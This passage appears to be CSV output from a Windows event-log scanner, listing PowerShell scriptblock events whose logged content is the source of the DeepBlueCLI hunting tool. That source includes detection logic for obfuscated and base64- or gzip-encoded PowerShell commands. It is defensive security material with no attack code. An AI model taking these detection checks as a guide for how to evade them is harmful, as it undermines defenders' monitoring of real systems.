deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:44:35.127 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"$text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:44:35.130 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $output += $eventxml.Event.EventData.Data[4].""#text"" $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:44:35.136 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:44:35.139 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:44:48.428 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:44:48.428 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:44:48.429 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:44:48.430 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:44:48.522 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:44:48.524 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:44:48.525 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:44:49.697 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:47:01.700 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:47:01.705 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ # The path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # 